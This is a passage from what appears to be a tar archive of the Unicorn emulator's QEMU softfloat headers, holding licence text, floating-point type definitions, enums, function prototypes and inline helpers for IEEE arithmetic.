0x0832, 0x0946, 0x0A67 }; static const uint16_t sqrtEvenAdjustments[] = { 0x0A2D, 0x08AF, 0x075A, 0x0629, 0x051A, 0x0429, 0x0356, 0x029E, 0x0200, 0x0179, 0x0109, 0x00AF, 0x0068, 0x0034, 0x0012, 0x0002 }; int8_t index; uint32_t z; index = ( a>>27 ) & 15; if ( aExp & 1 ) { z = 0x4000 + ( a>>17 ) - sqrtOddAdjustments[ (int)index ]; z = ( ( a / z )<<14 ) + ( z<<15 ); a >>= 1; } else { z = 0x8000 + ( a>>17 ) - sqrtEvenAdjustments[ (int)index ]; z = a / z + z; z = ( 0x20000 <= z ) ? 0xFFFF8000 : ( z<<15 ); if ( z <= a ) return (uint32_t) ( ( (int32_t) a )>>1 ); } return ( (uint32_t) ( ( ( (uint64_t) a )<<31 ) / z ) ) + ( z>>1 ); } /*---------------------------------------------------------------------------- | Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' | is equal to the 128-bit value formed by concatenating `b0' and `b1'. | Otherwise, returns 0. *----------------------------------------------------------------------------*/ static inline flag eq128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) { return ( a0 == b0 ) && ( a1 == b1 ); } /*---------------------------------------------------------------------------- | Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less | than or equal to the 128-bit value formed by concatenating `b0' and `b1'. | Otherwise, returns 0. *----------------------------------------------------------------------------*/ static inline flag le128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) { return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 <= b1 ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less | than the 128-bit value formed by concatenating `b0' and `b1'. Otherwise, | returns 0. *----------------------------------------------------------------------------*/ static inline flag lt128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) { return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 < b1 ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is | not equal to the 128-bit value formed by concatenating `b0' and `b1'. | Otherwise, returns 0. *----------------------------------------------------------------------------*/ static inline flag ne128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) { return ( a0 != b0 ) || ( a1 != b1 ); } #endif �����������������������unicorn-2.1.1/qemu/include/fpu/softfloat-types.h����������������������������������������������������0000664�0000000�0000000�00000014753�14675241067�0021716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * This header holds definitions for code that might be dealing with * softfloat types but not need access to the actual library functions. */ /* =============================================================================== This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef SOFTFLOAT_TYPES_H #define SOFTFLOAT_TYPES_H #include <stdint.h> /* This 'flag' type must be able to hold at least 0 and 1. It should * probably be replaced with 'bool' but the uses would need to be audited * to check that they weren't accidentally relying on it being a larger type. */ typedef uint8_t flag; /* * Software IEC/IEEE floating-point types. */ typedef uint16_t float16; typedef uint32_t float32; typedef uint64_t float64; #define float16_val(x) (x) #define float32_val(x) (x) #define float64_val(x) (x) #define make_float16(x) (x) #define make_float32(x) (x) #define make_float64(x) (x) #define const_float16(x) (x) #define const_float32(x) (x) #define const_float64(x) (x) typedef struct { uint64_t low; uint16_t high; } floatx80; #define make_floatx80(exp, mant) ((floatx80) { mant, exp }) #define make_floatx80_init(exp, mant) { .low = mant, .high = exp } typedef struct { #ifdef HOST_WORDS_BIGENDIAN uint64_t high, low; #else uint64_t low, high; #endif } float128; #define make_float128(high_, low_) ((float128) { .high = high_, .low = low_ }) #define make_float128_init(high_, low_) { .high = high_, .low = low_ } /* * Software IEC/IEEE floating-point underflow tininess-detection mode. */ enum { float_tininess_after_rounding = 0, float_tininess_before_rounding = 1 }; /* *Software IEC/IEEE floating-point rounding mode. */ enum { float_round_nearest_even = 0, float_round_down = 1, float_round_up = 2, float_round_to_zero = 3, float_round_ties_away = 4, /* Not an IEEE rounding mode: round to the closest odd mantissa value */ float_round_to_odd = 5, }; /* * Software IEC/IEEE floating-point exception flags. */ enum { float_flag_invalid = 1, float_flag_divbyzero = 4, float_flag_overflow = 8, float_flag_underflow = 16, float_flag_inexact = 32, float_flag_input_denormal = 64, float_flag_output_denormal = 128 }; /* * Floating Point Status. Individual architectures may maintain * several versions of float_status for different functions. The * correct status for the operation is then passed by reference to * most of the softfloat functions. */ typedef struct float_status { signed char float_detect_tininess; signed char float_rounding_mode; uint8_t float_exception_flags; signed char floatx80_rounding_precision; /* should denormalised results go to zero and set the inexact flag? */ flag flush_to_zero; /* should denormalised inputs go to zero and set the input_denormal flag? */ flag flush_inputs_to_zero; flag default_nan_mode; /* not always used -- see snan_bit_is_one() in softfloat-specialize.h */ flag snan_bit_is_one; } float_status; #endif /* SOFTFLOAT_TYPES_H */ ���������������������unicorn-2.1.1/qemu/include/fpu/softfloat.h����������������������������������������������������������0000664�0000000�0000000�00000115365�14675241067�0020555�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef SOFTFLOAT_H #define SOFTFLOAT_H /*---------------------------------------------------------------------------- | Software IEC/IEEE floating-point ordering relations *----------------------------------------------------------------------------*/ enum { float_relation_less = -1, float_relation_equal = 0, float_relation_greater = 1, float_relation_unordered = 2 }; #include "fpu/softfloat-types.h" #include "fpu/softfloat-helpers.h" /*---------------------------------------------------------------------------- | Routine to raise any or all of the software IEC/IEEE floating-point | exception flags. *----------------------------------------------------------------------------*/ void float_raise(uint8_t flags, float_status *status); /*---------------------------------------------------------------------------- | If `a' is denormal and we are in flush-to-zero mode then set the | input-denormal exception and return zero. Otherwise just return the value. *----------------------------------------------------------------------------*/ float16 float16_squash_input_denormal(float16 a, float_status *status); float32 float32_squash_input_denormal(float32 a, float_status *status); float64 float64_squash_input_denormal(float64 a, float_status *status); /*---------------------------------------------------------------------------- | Options to indicate which negations to perform in float*_muladd() | Using these differs from negating an input or output before calling | the muladd function in that this means that a NaN doesn't have its | sign bit inverted before it is propagated. | We also support halving the result before rounding, as a special | case to support the ARM fused-sqrt-step instruction FRSQRTS. *----------------------------------------------------------------------------*/ enum { float_muladd_negate_c = 1, float_muladd_negate_product = 2, float_muladd_negate_result = 4, float_muladd_halve_result = 8, }; /*---------------------------------------------------------------------------- | Software IEC/IEEE integer-to-floating-point conversion routines. *----------------------------------------------------------------------------*/ float16 int16_to_float16_scalbn(int16_t a, int, float_status *status); float16 int32_to_float16_scalbn(int32_t a, int, float_status *status); float16 int64_to_float16_scalbn(int64_t a, int, float_status *status); float16 uint16_to_float16_scalbn(uint16_t a, int, float_status *status); float16 uint32_to_float16_scalbn(uint32_t a, int, float_status *status); float16 uint64_to_float16_scalbn(uint64_t a, int, float_status *status); float16 int16_to_float16(int16_t a, float_status *status); float16 int32_to_float16(int32_t a, float_status *status); float16 int64_to_float16(int64_t a, float_status *status); float16 uint16_to_float16(uint16_t a, float_status *status); float16 uint32_to_float16(uint32_t a, float_status *status); float16 uint64_to_float16(uint64_t a, float_status *status); float32 int16_to_float32_scalbn(int16_t, int, float_status *status); float32 int32_to_float32_scalbn(int32_t, int, float_status *status); float32 int64_to_float32_scalbn(int64_t, int, float_status *status); float32 uint16_to_float32_scalbn(uint16_t, int, float_status *status); float32 uint32_to_float32_scalbn(uint32_t, int, float_status *status); float32 uint64_to_float32_scalbn(uint64_t, int, float_status *status); float32 int16_to_float32(int16_t, float_status *status); float32 int32_to_float32(int32_t, float_status *status); float32 int64_to_float32(int64_t, float_status *status); float32 uint16_to_float32(uint16_t, float_status *status); float32 uint32_to_float32(uint32_t, float_status *status); float32 uint64_to_float32(uint64_t, float_status *status); float64 int16_to_float64_scalbn(int16_t, int, float_status *status); float64 int32_to_float64_scalbn(int32_t, int, float_status *status); float64 int64_to_float64_scalbn(int64_t, int, float_status *status); float64 uint16_to_float64_scalbn(uint16_t, int, float_status *status); float64 uint32_to_float64_scalbn(uint32_t, int, float_status *status); float64 uint64_to_float64_scalbn(uint64_t, int, float_status *status); float64 int16_to_float64(int16_t, float_status *status); float64 int32_to_float64(int32_t, float_status *status); float64 int64_to_float64(int64_t, float_status *status); float64 uint16_to_float64(uint16_t, float_status *status); float64 uint32_to_float64(uint32_t, float_status *status); float64 uint64_to_float64(uint64_t, float_status *status); floatx80 int32_to_floatx80(int32_t, float_status *status); floatx80 int64_to_floatx80(int64_t, float_status *status); float128 int32_to_float128(int32_t, float_status *status); float128 int64_to_float128(int64_t, float_status *status); float128 uint64_to_float128(uint64_t, float_status *status); /*---------------------------------------------------------------------------- | Software half-precision conversion routines. *----------------------------------------------------------------------------*/ float16 float32_to_float16(float32, bool ieee, float_status *status); float32 float16_to_float32(float16, bool ieee, float_status *status); float16 float64_to_float16(float64 a, bool ieee, float_status *status); float64 float16_to_float64(float16 a, bool ieee, float_status *status); int16_t float16_to_int16_scalbn(float16, int, int, float_status *status); int32_t float16_to_int32_scalbn(float16, int, int, float_status *status); int64_t float16_to_int64_scalbn(float16, int, int, float_status *status); int16_t float16_to_int16(float16, float_status *status); int32_t float16_to_int32(float16, float_status *status); int64_t float16_to_int64(float16, float_status *status); int16_t float16_to_int16_round_to_zero(float16, float_status *status); int32_t float16_to_int32_round_to_zero(float16, float_status *status); int64_t float16_to_int64_round_to_zero(float16, float_status *status); uint16_t float16_to_uint16_scalbn(float16 a, int, int, float_status *status); uint32_t float16_to_uint32_scalbn(float16 a, int, int, float_status *status); uint64_t float16_to_uint64_scalbn(float16 a, int, int, float_status *status); uint16_t float16_to_uint16(float16 a, float_status *status); uint32_t float16_to_uint32(float16 a, float_status *status); uint64_t float16_to_uint64(float16 a, float_status *status); uint16_t float16_to_uint16_round_to_zero(float16 a, float_status *status); uint32_t float16_to_uint32_round_to_zero(float16 a, float_status *status); uint64_t float16_to_uint64_round_to_zero(float16 a, float_status *status); /*---------------------------------------------------------------------------- | Software half-precision operations. *----------------------------------------------------------------------------*/ float16 float16_round_to_int(float16, float_status *status); float16 float16_add(float16, float16, float_status *status); float16 float16_sub(float16, float16, float_status *status); float16 float16_mul(float16, float16, float_status *status); float16 float16_muladd(float16, float16, float16, int, float_status *status); float16 float16_div(float16, float16, float_status *status); float16 float16_scalbn(float16, int, float_status *status); float16 float16_min(float16, float16, float_status *status); float16 float16_max(float16, float16, float_status *status); float16 float16_minnum(float16, float16, float_status *status); float16 float16_maxnum(float16, float16, float_status *status); float16 float16_minnummag(float16, float16, float_status *status); float16 float16_maxnummag(float16, float16, float_status *status); float16 float16_sqrt(float16, float_status *status); int float16_compare(float16, float16, float_status *status); int float16_compare_quiet(float16, float16, float_status *status); int float16_is_quiet_nan(float16, float_status *status); int float16_is_signaling_nan(float16, float_status *status); float16 float16_silence_nan(float16, float_status *status); static inline int float16_is_any_nan(float16 a) { return ((float16_val(a) & ~0x8000) > 0x7c00); } static inline int float16_is_neg(float16 a) { return float16_val(a) >> 15; } static inline int float16_is_infinity(float16 a) { return (float16_val(a) & 0x7fff) == 0x7c00; } static inline int float16_is_zero(float16 a) { return (float16_val(a) & 0x7fff) == 0; } static inline int float16_is_zero_or_denormal(float16 a) { return (float16_val(a) & 0x7c00) == 0; } static inline float16 float16_abs(float16 a) { /* Note that abs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float16(float16_val(a) & 0x7fff); } static inline float16 float16_chs(float16 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float16(float16_val(a) ^ 0x8000); } static inline float16 float16_set_sign(float16 a, int sign) { return make_float16((float16_val(a) & 0x7fff) | (sign << 15)); } #define float16_zero make_float16(0) #define float16_half make_float16(0x3800) #define float16_one make_float16(0x3c00) #define float16_one_point_five make_float16(0x3e00) #define float16_two make_float16(0x4000) #define float16_three make_float16(0x4200) #define float16_infinity make_float16(0x7c00) /*---------------------------------------------------------------------------- | The pattern for a default generated half-precision NaN. *----------------------------------------------------------------------------*/ float16 float16_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE single-precision conversion routines. *----------------------------------------------------------------------------*/ int16_t float32_to_int16_scalbn(float32, int, int, float_status *status); int32_t float32_to_int32_scalbn(float32, int, int, float_status *status); int64_t float32_to_int64_scalbn(float32, int, int, float_status *status); int16_t float32_to_int16(float32, float_status *status); int32_t float32_to_int32(float32, float_status *status); int64_t float32_to_int64(float32, float_status *status); int16_t float32_to_int16_round_to_zero(float32, float_status *status); int32_t float32_to_int32_round_to_zero(float32, float_status *status); int64_t float32_to_int64_round_to_zero(float32, float_status *status); uint16_t float32_to_uint16_scalbn(float32, int, int, float_status *status); uint32_t float32_to_uint32_scalbn(float32, int, int, float_status *status); uint64_t float32_to_uint64_scalbn(float32, int, int, float_status *status); uint16_t float32_to_uint16(float32, float_status *status); uint32_t float32_to_uint32(float32, float_status *status); uint64_t float32_to_uint64(float32, float_status *status); uint16_t float32_to_uint16_round_to_zero(float32, float_status *status); uint32_t float32_to_uint32_round_to_zero(float32, float_status *status); uint64_t float32_to_uint64_round_to_zero(float32, float_status *status); float64 float32_to_float64(float32, float_status *status); floatx80 float32_to_floatx80(float32, float_status *status); float128 float32_to_float128(float32, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE single-precision operations. *----------------------------------------------------------------------------*/ float32 float32_round_to_int(float32, float_status *status); float32 float32_add(float32, float32, float_status *status); float32 float32_sub(float32, float32, float_status *status); float32 float32_mul(float32, float32, float_status *status); float32 float32_div(float32, float32, float_status *status); float32 float32_rem(float32, float32, float_status *status); float32 float32_muladd(float32, float32, float32, int, float_status *status); float32 float32_sqrt(float32, float_status *status); float32 float32_exp2(float32, float_status *status); float32 float32_log2(float32, float_status *status); int float32_eq(float32, float32, float_status *status); int float32_le(float32, float32, float_status *status); int float32_lt(float32, float32, float_status *status); int float32_unordered(float32, float32, float_status *status); int float32_eq_quiet(float32, float32, float_status *status); int float32_le_quiet(float32, float32, float_status *status); int float32_lt_quiet(float32, float32, float_status *status); int float32_unordered_quiet(float32, float32, float_status *status); int float32_compare(float32, float32, float_status *status); int float32_compare_quiet(float32, float32, float_status *status); float32 float32_min(float32, float32, float_status *status); float32 float32_max(float32, float32, float_status *status); float32 float32_minnum(float32, float32, float_status *status); float32 float32_maxnum(float32, float32, float_status *status); float32 float32_minnummag(float32, float32, float_status *status); float32 float32_maxnummag(float32, float32, float_status *status); int float32_is_quiet_nan(float32, float_status *status); int float32_is_signaling_nan(float32, float_status *status); float32 float32_silence_nan(float32, float_status *status); float32 float32_scalbn(float32, int, float_status *status); static inline float32 float32_abs(float32 a) { /* Note that abs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float32(float32_val(a) & 0x7fffffff); } static inline float32 float32_chs(float32 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float32(float32_val(a) ^ 0x80000000); } static inline int float32_is_infinity(float32 a) { return (float32_val(a) & 0x7fffffff) == 0x7f800000; } static inline int float32_is_neg(float32 a) { return float32_val(a) >> 31; } static inline int float32_is_zero(float32 a) { return (float32_val(a) & 0x7fffffff) == 0; } static inline int float32_is_any_nan(float32 a) { return ((float32_val(a) & ~(1 << 31)) > 0x7f800000UL); } static inline int float32_is_zero_or_denormal(float32 a) { return (float32_val(a) & 0x7f800000) == 0; } static inline bool float32_is_normal(float32 a) { return (((float32_val(a) >> 23) + 1) & 0xff) >= 2; } static inline bool float32_is_denormal(float32 a) { return float32_is_zero_or_denormal(a) && !float32_is_zero(a); } static inline bool float32_is_zero_or_normal(float32 a) { return float32_is_normal(a) || float32_is_zero(a); } static inline float32 float32_set_sign(float32 a, int sign) { return make_float32((float32_val(a) & 0x7fffffff) | (sign << 31)); } #define float32_zero make_float32(0) #define float32_half make_float32(0x3f000000) #define float32_one make_float32(0x3f800000) #define float32_one_point_five make_float32(0x3fc00000) #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_infinity make_float32(0x7f800000) /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into a | single-precision floating-point value, returning the result. After being | shifted into the proper positions, the three fields are simply added | together to form the result. This means that any integer portion of `zSig' | will be added into the exponent. Since a properly normalized significand | will have an integer portion equal to 1, the `zExp' input should be 1 less | than the desired result exponent whenever `zSig' is a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float32 packFloat32(flag zSign, int zExp, uint32_t zSig) { return make_float32( (((uint32_t)zSign) << 31) + (((uint32_t)zExp) << 23) + zSig); } /*---------------------------------------------------------------------------- | The pattern for a default generated single-precision NaN. *----------------------------------------------------------------------------*/ float32 float32_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE double-precision conversion routines. *----------------------------------------------------------------------------*/ int16_t float64_to_int16_scalbn(float64, int, int, float_status *status); int32_t float64_to_int32_scalbn(float64, int, int, float_status *status); int64_t float64_to_int64_scalbn(float64, int, int, float_status *status); int16_t float64_to_int16(float64, float_status *status); int32_t float64_to_int32(float64, float_status *status); int64_t float64_to_int64(float64, float_status *status); int16_t float64_to_int16_round_to_zero(float64, float_status *status); int32_t float64_to_int32_round_to_zero(float64, float_status *status); int64_t float64_to_int64_round_to_zero(float64, float_status *status); uint16_t float64_to_uint16_scalbn(float64, int, int, float_status *status); uint32_t float64_to_uint32_scalbn(float64, int, int, float_status *status); uint64_t float64_to_uint64_scalbn(float64, int, int, float_status *status); uint16_t float64_to_uint16(float64, float_status *status); uint32_t float64_to_uint32(float64, float_status *status); uint64_t float64_to_uint64(float64, float_status *status); uint16_t float64_to_uint16_round_to_zero(float64, float_status *status); uint32_t float64_to_uint32_round_to_zero(float64, float_status *status); uint64_t float64_to_uint64_round_to_zero(float64, float_status *status); float32 float64_to_float32(float64, float_status *status); floatx80 float64_to_floatx80(float64, float_status *status); float128 float64_to_float128(float64, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE double-precision operations. *----------------------------------------------------------------------------*/ float64 float64_round_to_int(float64, float_status *status); float64 float64_add(float64, float64, float_status *status); float64 float64_sub(float64, float64, float_status *status); float64 float64_mul(float64, float64, float_status *status); float64 float64_div(float64, float64, float_status *status); float64 float64_rem(float64, float64, float_status *status); float64 float64_muladd(float64, float64, float64, int, float_status *status); float64 float64_sqrt(float64, float_status *status); float64 float64_log2(float64, float_status *status); int float64_eq(float64, float64, float_status *status); int float64_le(float64, float64, float_status *status); int float64_lt(float64, float64, float_status *status); int float64_unordered(float64, float64, float_status *status); int float64_eq_quiet(float64, float64, float_status *status); int float64_le_quiet(float64, float64, float_status *status); int float64_lt_quiet(float64, float64, float_status *status); int float64_unordered_quiet(float64, float64, float_status *status); int float64_compare(float64, float64, float_status *status); int float64_compare_quiet(float64, float64, float_status *status); float64 float64_min(float64, float64, float_status *status); float64 float64_max(float64, float64, float_status *status); float64 float64_minnum(float64, float64, float_status *status); float64 float64_maxnum(float64, float64, float_status *status); float64 float64_minnummag(float64, float64, float_status *status); float64 float64_maxnummag(float64, float64, float_status *status); int float64_is_quiet_nan(float64 a, float_status *status); int float64_is_signaling_nan(float64, float_status *status); float64 float64_silence_nan(float64, float_status *status); float64 float64_scalbn(float64, int, float_status *status); static inline float64 float64_abs(float64 a) { /* Note that abs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float64(float64_val(a) & 0x7fffffffffffffffLL); } static inline float64 float64_chs(float64 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float64(float64_val(a) ^ 0x8000000000000000LL); } static inline int float64_is_infinity(float64 a) { return (float64_val(a) & 0x7fffffffffffffffLL ) == 0x7ff0000000000000LL; } static inline int float64_is_neg(float64 a) { return float64_val(a) >> 63; } static inline int float64_is_zero(float64 a) { return (float64_val(a) & 0x7fffffffffffffffLL) == 0; } static inline int float64_is_any_nan(float64 a) { return ((float64_val(a) & ~(1ULL << 63)) > 0x7ff0000000000000ULL); } static inline int float64_is_zero_or_denormal(float64 a) { return (float64_val(a) & 0x7ff0000000000000LL) == 0; } static inline bool float64_is_normal(float64 a) { return (((float64_val(a) >> 52) + 1) & 0x7ff) >= 2; } static inline bool float64_is_denormal(float64 a) { return float64_is_zero_or_denormal(a) && !float64_is_zero(a); } static inline bool float64_is_zero_or_normal(float64 a) { return float64_is_normal(a) || float64_is_zero(a); } static inline float64 float64_set_sign(float64 a, int sign) { return make_float64((float64_val(a) & 0x7fffffffffffffffULL) | ((int64_t)sign << 63)); } #define float64_zero make_float64(0) #define float64_half make_float64(0x3fe0000000000000LL) #define float64_one make_float64(0x3ff0000000000000LL) #define float64_one_point_five make_float64(0x3FF8000000000000ULL) #define float64_two make_float64(0x4000000000000000ULL) #define float64_three make_float64(0x4008000000000000ULL) #define float64_ln2 make_float64(0x3fe62e42fefa39efLL) #define float64_infinity make_float64(0x7ff0000000000000LL) /*---------------------------------------------------------------------------- | The pattern for a default generated double-precision NaN. *----------------------------------------------------------------------------*/ float64 float64_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE extended double-precision conversion routines. *----------------------------------------------------------------------------*/ int32_t floatx80_to_int32(floatx80, float_status *status); int32_t floatx80_to_int32_round_to_zero(floatx80, float_status *status); int64_t floatx80_to_int64(floatx80, float_status *status); int64_t floatx80_to_int64_round_to_zero(floatx80, float_status *status); float32 floatx80_to_float32(floatx80, float_status *status); float64 floatx80_to_float64(floatx80, float_status *status); float128 floatx80_to_float128(floatx80, float_status *status); /*---------------------------------------------------------------------------- | The pattern for an extended double-precision inf. *----------------------------------------------------------------------------*/ extern const floatx80 floatx80_infinity; /*---------------------------------------------------------------------------- | Software IEC/IEEE extended double-precision operations. *----------------------------------------------------------------------------*/ floatx80 floatx80_round(floatx80 a, float_status *status); floatx80 floatx80_round_to_int(floatx80, float_status *status); floatx80 floatx80_add(floatx80, floatx80, float_status *status); floatx80 floatx80_sub(floatx80, floatx80, float_status *status); floatx80 floatx80_mul(floatx80, floatx80, float_status *status); floatx80 floatx80_div(floatx80, floatx80, float_status *status); floatx80 floatx80_rem(floatx80, floatx80, float_status *status); floatx80 floatx80_sqrt(floatx80, float_status *status); int floatx80_eq(floatx80, floatx80, float_status *status); int floatx80_le(floatx80, floatx80, float_status *status); int floatx80_lt(floatx80, floatx80, float_status *status); int floatx80_unordered(floatx80, floatx80, float_status *status); int floatx80_eq_quiet(floatx80, floatx80, float_status *status); int floatx80_le_quiet(floatx80, floatx80, float_status *status); int floatx80_lt_quiet(floatx80, floatx80, float_status *status); int floatx80_unordered_quiet(floatx80, floatx80, float_status *status); int floatx80_compare(floatx80, floatx80, float_status *status); int floatx80_compare_quiet(floatx80, floatx80, float_status *status); int floatx80_is_quiet_nan(floatx80, float_status *status); int floatx80_is_signaling_nan(floatx80, float_status *status); floatx80 floatx80_silence_nan(floatx80, float_status *status); floatx80 floatx80_scalbn(floatx80, int, float_status *status); static inline floatx80 floatx80_abs(floatx80 a) { a.high &= 0x7fff; return a; } static inline floatx80 floatx80_chs(floatx80 a) { a.high ^= 0x8000; return a; } static inline int floatx80_is_infinity(floatx80 a) { #if defined(TARGET_M68K) return (a.high & 0x7fff) == floatx80_infinity.high && !(a.low << 1); #else return (a.high & 0x7fff) == floatx80_infinity.high && a.low == floatx80_infinity.low; #endif } static inline int floatx80_is_neg(floatx80 a) { return a.high >> 15; } static inline int floatx80_is_zero(floatx80 a) { return (a.high & 0x7fff) == 0 && a.low == 0; } static inline int floatx80_is_zero_or_denormal(floatx80 a) { return (a.high & 0x7fff) == 0; 